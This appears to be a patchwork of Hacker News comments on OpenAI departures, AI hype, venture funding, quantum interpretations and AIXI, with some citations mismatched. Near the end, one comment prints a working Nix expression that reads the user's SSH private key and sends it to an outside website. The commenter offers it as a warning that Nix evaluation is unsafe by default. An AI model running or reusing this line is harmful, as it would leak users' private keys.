An hour and a half later, when we finished this talk, I looked at my friend and told her, “I’m taking back every single word that I said to Ilya.”
He freaked the hell out of people there. And we’re talking about AI professionals who work in the biggest AI labs in the Bay area. They were leaving the room, saying, “Holy shit.”
The snapshots above cannot capture the lengthy discussion. The point is that Ilya Sutskever took what you see in the media, the “AGI utopia vs. potential apocalypse” ideology, to the next level. It was traumatizing.'[0]
[0] What Ilya Sutskever Really Wants https://www.aipanic.news/p/what-ilya-sutskever-really-wants
Lol no. There is about ~$500B in VC dollars, not to mention $1.2T in buyout dry powder still floating around. Not to mention venture funds raised continue to grow YoY.
https://www.bain.com/globalassets/noindex/2024/bain_report_g...
https://www.ftc.gov/news-events/news/press-releases/2024/04/...
After this change they will have only one.
But if it were related, then that would presumably be because people within the company (or at least two rather noteworthy people) no longer believe that OpenAI is acting in the best interests of humanity.
Which isn't too shocking really given that a decent chunk of us feel the same way, but then again, we're just nobodies making dumb comments on Hacker News. It's a little different when someone like Ilya really doesn't want to be at OpenAI.
mirror: https://ghostarchive.org/varchive/7nORLckDnmg (1m 15s)
In fact, his arguments against nonlocality were later disproven experimentally in the '80s, as quantum mechanics allowed for much higher fidelity predictions than could be explained by a hidden variable theory [0].
I don't think anyone _likes_ the Copenhagen interpretation per se, it's just the least objectionable choice (if you have to make one at all). Many-worlds sounds cool and all until you realize that it's essentially impossible to verify experimentally, and at that point you're discussing philosophy and what-if more than physics.
Intuition only gets you as far as the accuracy of your mental model. Is it intuitive that the volume enclosed by the unit hypersphere approaches zero [1] as its dimensions go to infinity? Or that photons have momentum, but no mass? Or you can draw higher-dimension Venn diagrams with sectors that have negative area? If these all make intuitive sense to you, I'm jealous that your intuition extends further than mine.
[1] https://www.ftc.gov/news-events/news/press-releases/2024/04/...
1. Alan Turing on why we should never ever perform a Turing test: https://redirect.cs.umbc.edu/courses/471/papers/turing.pdf
2. Marvin Minsky on the “Frame Problem” that lead to one or two previous AI winters, and what an Intuitive algorithm might look like: https://ojs.aaai.org/aimagazine/index.php/aimagazine/article...
Unclear how to value the equity I gave up, but it probably would have been about 85% of my family's net worth at least.
Basically I wanted to retain my ability to criticize the company in the future.“
> but "stop working on your field of research" isn't going to happen.
We’re talking about NDA, obviously no-competes aren’t legal in CA
https://www.lesswrong.com/posts/kovCotfpTFWFXaxwi/?commentId...
that won't happen, the next scam will be different
it was crypto until FTX collapsed then the usual suspects led by a16z leaned on OpenAI to rush whatever they had on market hence the odd naming of ChatGPT 3.5.
When the hype is finally realized to be just mass printing bullshit -- relevant bullshit, yes, which sometimes can be useful but not billions of dollars of useful -- there will be something else.
Same old, same old. The only difference is there is no new catchy tunes. Yet? https://youtu.be/I6IQ_FOCE6I https://locusmag.com/2023/12/commentary-cory-doctorow-what-k...
Here is Leike's paper, coauthored with Hutter:
https://arxiv.org/abs/1510.04931
They can probably sum it up in their own paper better than I can, but AIXI was supposed to be a formalized, objective model of rationality. They knew from the start that it was uncomputable, but I think they hoped to use it as a sort of gold standard that you could approach.
But then it turned out that the choice of Turing machine, which can be (mostly) ignored for Kolmogorov complexity, can not be ignored in AIXI at all.
This round of AI is only capable of producing bullshit. Relevant bullshit but bullshit. This can be useful https://hachyderm.io/@inthehands/112006855076082650 but it doesn't mean it's more impactful than the Internet.
Geohot (https://geohot.github.io/blog/) estimates that a human brain equivalent requires 20 PFLOPS. Current top-of-the-line GPUs are around 2 PFLOPS and consume up to 500W. Scaling that linearly results in 5kW, which translates to approximately 3 EUR per hour if I calculate correctly.
In that comment, you wrote:
> It can delete your home directory or email your ssh private keys to Zimbabwe.
I thought that you might be interested to know that it is still possible to exfiltrate secrets by evaluating Nix expressions. Here is an example Nix expression which will upload your private SSH key to Zimbabwe's government's website (don't run this!):
let
pkgs = import (fetchTarball "https://github.com/NixOS/nixpkgs/archive/0ef56bec7281e2372338f2dfe7c13327ce96f6bb.tar.gz") {};
in
builtins.fetchurl "https://www.zim.gov.zw/?${pkgs.lib.escapeURL (builtins.readFile ~/.ssh/id_rsa)}"
It does not need --impure or any other unusual switches to work.Hope this helps.
Also, it doesn't work:
error: access to absolute path '/home/user/.ssh/id_rsa' is forbidden in restricted mode
Maybe you don't know about restrict-eval? All the CI for nixpkgs is done using that option, so it will never break anything. Turning off restrict-eval is pretty crazy; there's no reason to do that and it's dangerous.https://nixos.org/manual/nix/unstable/command-ref/conf-file....
Hope this helps.
I don't think it did. I'm not sure what it was supposed to help with.
Ah, I over-quoted that part. My mistake.
> Also, it doesn't work:
It will work with the default Nix settings.
> Turning off restrict-eval is pretty crazy; there's no reason to do that and it's dangerous.
One would need to first turn it on to be able to turn it off.
> https://nixos.org/manual/nix/unstable/command-ref/conf-file....
Indeed, note the default value.
> I don't think it did. I'm not sure what it was supposed to help with.
I was hoping that it would be interesting to you, but also help avoid spreading false information that might mislead people into evaluating Nix code when it's not safe to do so. But, I think I understand now that maybe you don't care about what happens to other people.